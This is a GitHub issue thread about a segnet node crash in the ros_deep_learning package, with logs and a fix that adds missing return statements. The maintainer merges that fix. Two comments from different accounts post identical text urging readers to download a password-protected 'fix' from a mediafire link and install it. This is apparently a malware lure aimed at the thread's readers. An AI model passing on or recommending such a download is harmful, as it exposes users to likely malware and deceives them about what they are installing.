dusty-nv/ros_deep_learning #140: `segnet` Node Crashes with "double free or corruption" Error During Launch

YL-Tan, 2024-08-27:
When trying to launch the `segnet` node using the `ros_deep_learning` package with the following command:
```bash
roslaunch ros_deep_learning segnet.ros1.launch input:=v4l2:///dev/video4 output:=display://0
```
The node crashes with the following error:
```text
...
[ INFO] [1724721245.224459610]: allocated CUDA memory for 1280x720 image conversion
double free or corruption (!prev)
[segnet-3] process has died [pid 176, exit code -6, cmd /ros_deep_learning/devel/lib/ros_deep_learning/segnet /segnet/image_in:=/video_source/raw __name:=segnet __log:=/root/.ros/log/a3c743d6-6411-11ef-87d9-28d0431cfa8d/segnet-3.log].
log file: /root/.ros/log/a3c743d6-6411-11ef-87d9-28d0431cfa8d/segnet-3*.log
```
### Full Log Output:
```text
... logging to /root/.ros/log/a3c743d6-6411-11ef-87d9-28d0431cfa8d/roslaunch-ubuntu-140.log
Checking log directory for disk usage. This may take a while.
Press Ctrl-C to interrupt
Done checking log file disk usage. Usage is <1GB.

started roslaunch server http://ubuntu:39177/

SUMMARY
========

PARAMETERS
 * /rosdistro: noetic
 * /rosversion: 1.16.0
 * /segnet/class_colors_path: 
 * /segnet/class_labels_path: 
 * /segnet/input_blob: 
 * /segnet/mask_filter: linear
 * /segnet/model_name: fcn-resnet18-mhp-...
 * /segnet/model_path: 
 * /segnet/output_blob: 
 * /segnet/overlay_alpha: 180.0
 * /segnet/overlay_filter: linear
 * /segnet/prototxt_path: 
 * /video_output/bitrate: 0
 * /video_output/codec: unknown
 * /video_output/resource: display://0
 * /video_source/height: 0
 * /video_source/loop: 0
 * /video_source/resource: v4l2:///dev/video4
 * /video_source/width: 0

NODES
  /
    segnet (ros_deep_learning/segnet)
    video_output (ros_deep_learning/video_output)
    video_source (ros_deep_learning/video_source)

auto-starting new master
process[master]: started with pid [153]
ROS_MASTER_URI=http://localhost:11311

setting /run_id to a3c743d6-6411-11ef-87d9-28d0431cfa8d
process[rosout-1]: started with pid [168]
started core service [/rosout]
process[video_source-2]: started with pid [175]
process[segnet-3]: started with pid [176]
process[video_output-4]: started with pid [177]
[ INFO] [1724721240.865774799]: opening video source: v4l2:///dev/video4
[gstreamer] initialized gstreamer, version 1.16.3.0
[gstreamer] gstCamera -- attempting to create device v4l2:///dev/video4
[ INFO] [1724721240.899158727]: opening video output: display://0
[OpenGL] glDisplay -- X screen 0 resolution:  1920x1080
[OpenGL] glDisplay -- X window resolution:    1920x1080
[gstreamer] gstCamera -- found v4l2 device: Intel(R) RealSense(TM) Depth Ca
[gstreamer] v4l2-proplist, device.path=(string)/dev/video4, udev-probed=(boolean)false, device.api=(string)v4l2, v4l2.device.driver=(string)uvcvideo, v4l2.device.card=(string)"Intel\(R\)\ RealSense\(TM\)\ Depth\ Ca", v4l2.device.bus_info=(string)usb-3610000.xhci-1.1, v4l2.device.version=(uint)330360, v4l2.device.capabilities=(uint)2225078273, v4l2.device.device_caps=(uint)69206017;
[gstreamer] gstCamera -- found 7 caps for v4l2 device /dev/video4
[... 199 lines cut ...]
[TRT]    class 08  color 107.000000 142.000000 35.000000 255.000000
[TRT]    class 09  color 255.000000 0.000000 0.000000 255.000000
[TRT]    class 10  color 245.000000 222.000000 179.000000 255.000000
[TRT]    class 11  color 0.000000 0.000000 255.000000 255.000000
[TRT]    class 12  color 0.000000 255.000000 255.000000 255.000000
[TRT]    class 13  color 238.000000 130.000000 238.000000 255.000000
[TRT]    class 14  color 128.000000 0.000000 128.000000 255.000000
[TRT]    class 15  color 255.000000 0.000000 0.000000 255.000000
[TRT]    class 16  color 255.000000 0.000000 255.000000 255.000000
[TRT]    class 17  color 128.000000 128.000000 128.000000 255.000000
[TRT]    class 18  color 192.000000 192.000000 192.000000 255.000000
[TRT]    class 19  color 128.000000 128.000000 128.000000 255.000000
[TRT]    class 20  color 128.000000 128.000000 128.000000 255.000000
[TRT]    loaded 21 class colors
[ INFO] [1724721244.917549168]: model hash => 1987947487477878254
[ INFO] [1724721244.920395247]: hash string => /usr/local/bin/networks/FCN-ResNet18-MHP-512x320/fcn_resnet18.onnx/usr/local/bin/networks/FCN-ResNet18-MHP-512x320/classes.txt
[ INFO] [1724721244.923732964]: node namespace => /segnet
[ INFO] [1724721244.923812487]: class labels => /segnet/class_labels_1987947487477878254
[ INFO] [1724721244.943880455]: segnet node initialized, waiting for messages
[ INFO] [1724721245.192920619]: allocated CUDA memory for 1280x720 image conversion
[ INFO] [1724721245.224459610]: allocated CUDA memory for 1280x720 image conversion
double free or corruption (!prev)
[segnet-3] process has died [pid 176, exit code -6, cmd /ros_deep_learning/devel/lib/ros_deep_learning/segnet /segnet/image_in:=/video_source/raw __name:=segnet __log:=/root/.ros/log/a3c743d6-6411-11ef-87d9-28d0431cfa8d/segnet-3.log].
log file: /root/.ros/log/a3c743d6-6411-11ef-87d9-28d0431cfa8d/segnet-3*.log
```

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

YL-Tan, 2024-08-27:
After running `catkin_make clean` and then `catkin_make`, I noticed some warnings about "control reaches end of non-void function." These warnings indicate that the functions `publish_overlay`, `publish_mask_color`, and `publish_mask_class` are expected to return a value, but the code paths leading to the end of these functions do not return anything. It also seems that `imagenet` and `detectnet` have similar warnings regarding their own `publish_overlay` functions.

```bash
root@ubuntu:/ros_deep_learning# catkin_make      
Base path: /ros_deep_learning
Source space: /ros_deep_learning/src
Build space: /ros_deep_learning/build
Devel space: /ros_deep_learning/devel
Install space: /ros_deep_learning/install
####
#### Running command: "make cmake_check_build_system" in "/ros_deep_learning/build"
####
####
#### Running command: "make -j6 -l6" in "/ros_deep_learning/build"
####
[  0%] Built target sensor_msgs_generate_messages_lisp
[  0%] Built target std_msgs_generate_messages_py
[  0%] Built target sensor_msgs_generate_messages_py
[  0%] Built target sensor_msgs_generate_messages_nodejs
[  0%] Built target sensor_msgs_generate_messages_cpp
[  0%] Built target sensor_msgs_generate_messages_eus
[  0%] Built target geometry_msgs_generate_messages_eus
[  0%] Built target geometry_msgs_generate_messages_lisp
[  0%] Built target geometry_msgs_generate_messages_nodejs
[  0%] Built target std_msgs_generate_messages_cpp
[  0%] Built target geometry_msgs_generate_messages_cpp
[  0%] Built target geometry_msgs_generate_messages_py
[  0%] Built target std_msgs_generate_messages_lisp
[  0%] Built target std_msgs_generate_messages_nodejs
[  0%] Built target std_msgs_generate_messages_eus
[  1%] Building CXX object ros_deep_learning/CMakeFiles/segnet.dir/src/node_segnet.cpp.o
[  3%] Building CXX object ros_deep_learning/CMakeFiles/detectnet.dir/src/node_detectnet.cpp.o
[  5%] Building CXX object ros_deep_learning/CMakeFiles/imagenet.dir/src/node_imagenet.cpp.o
[  6%] Building CXX object ros_deep_learning/CMakeFiles/video_source.dir/src/node_video_source.cpp.o
[  8%] Building CXX object ros_deep_learning/CMakeFiles/ros_deep_learning_nodelets.dir/src/nodelet_imagenet.cpp.o
[ 10%] Building CXX object ros_deep_learning/CMakeFiles/video_output.dir/src/node_video_output.cpp.o
/ros_deep_learning/src/ros_deep_learning/src/node_segnet.cpp: In function ‘bool publish_overlay(uint32_t, uint32_t)’:
/ros_deep_learning/src/ros_deep_learning/src/node_segnet.cpp:70:21: warning: control reaches end of non-void function [-Wreturn-type]
   70 |  sensor_msgs::Image msg;
      |                     ^~~
/ros_deep_learning/src/ros_deep_learning/src/node_segnet.cpp: In function ‘bool publish_mask_color(uint32_t, uint32_t)’:
/ros_deep_learning/src/ros_deep_learning/src/node_segnet.cpp:95:21: warning: control reaches end of non-void function [-Wreturn-type]
   95 |  sensor_msgs::Image msg;
      |                     ^~~
/ros_deep_learning/src/ros_deep_learning/src/node_segnet.cpp: In function ‘bool publish_mask_class(uint32_t, uint32_t)’:
/ros_deep_learning/src/ros_deep_learning/src/node_segnet.cpp:120:21: warning: control reaches end of non-void function [-Wreturn-type]
  120 |  sensor_msgs::Image msg;
      |                     ^~~
/ros_deep_learning/src/ros_deep_learning/src/node_imagenet.cpp: In function ‘bool publish_overlay(int, float)’:
/ros_deep_learning/src/ros_deep_learning/src/node_imagenet.cpp:82:21: warning: control reaches end of non-void function [-Wreturn-type]
   82 |  sensor_msgs::Image msg;
      |                     ^~~
[ 11%] Building CXX object ros_deep_learning/CMakeFiles/video_source.dir/src/image_converter.cpp.o
/ros_deep_learning/src/ros_deep_learning/src/node_detectnet.cpp: In function ‘bool publish_overlay(detectNet::Detection*, int)’:
/ros_deep_learning/src/ros_deep_learning/src/node_detectnet.cpp:72:21: warning: control reaches end of non-void function [-Wreturn-type]
   72 |  sensor_msgs::Image msg;
      |                     ^~~
[ 13%] Building CXX object ros_deep_learning/CMakeFiles/ros_deep_learning_nodelets.dir/src/image_converter.cpp.o
[ 15%] Building CXX object ros_deep_learning/CMakeFiles/video_output.dir/src/image_converter.cpp.o
[ 16%] Building CXX object ros_deep_learning/CMakeFiles/segnet.dir/src/image_converter.cpp.o
[ 18%] Building CXX object ros_deep_learning/CMakeFiles/imagenet.dir/src/image_converter.cpp.o
[ 20%] Building CXX object ros_deep_learning/CMakeFiles/detectnet.dir/src/image_converter.cpp.o
[ 22%] Building CXX object ros_deep_learning/CMakeFiles/video_source.dir/src/ros_compat.cpp.o
[ 23%] Linking CXX shared library /ros_deep_learning/devel/lib/libros_deep_learning_nodelets.so
[ 25%] Building CXX object ros_deep_learning/CMakeFiles/video_output.dir/src/ros_compat.cpp.o
[ 25%] Built target ros_deep_learning_nodelets
[ 25%] Built target _realsense2_camera_generate_messages_check_deps_DeviceInfo
[ 25%] Built target _realsense2_camera_generate_messages_check_deps_IMUInfo
[ 27%] Building CXX object ros_deep_learning/CMakeFiles/segnet.dir/src/ros_compat.cpp.o
[ 27%] Built target _realsense2_camera_generate_messages_check_deps_Extrinsics
[... 112 lines cut ...]
[ 91%] Building CXX object vision_opencv/cv_bridge/src/CMakeFiles/cv_bridge_boost.dir/module_opencv4.cpp.o
[ 91%] Building CXX object vision_opencv/cv_bridge/src/CMakeFiles/cv_bridge_boost.dir/module.cpp.o
[ 93%] Building CXX object realsense-ros/realsense2_camera/CMakeFiles/realsense2_camera.dir/src/realsense_node_factory.cpp.o
[... cut ...]
2.     publish_mask_color(uint32_t, uint32_t)
3.     publish_mask_class(uint32_t, uint32_t)
4.     publish_overlay(int, float)
5.     publish_overlay(detectNet::Detection*, int)

## How I fix the warnings
I updated all the affected functions by adding a `return true;` statement at the end of each function to ensure they return a value.

## Concerns:
I am unsure if this solution might break the codebase in any way. However, after making these modifications, I can launch the nodes to start real-time inference without any issues.

dusty-nv, 2024-08-27:
Aha ok thank you @YL-Tan, I had always wondered about those warnings too but was just thought it was some ROS thing and did not experience the double-free or memory corruption issue that you encountered.  If you were to submit a PR for these changes I would be happy to merge it, thank you 👍

YL-Tan, 2024-08-27:
Hi @dusty-nv, my pleasure! I've submitted my PR (#141). Please review it when you have time.

dusty-nv, 2024-08-28:
Thanks @YL-Tan, much appreciated - just merged it 👍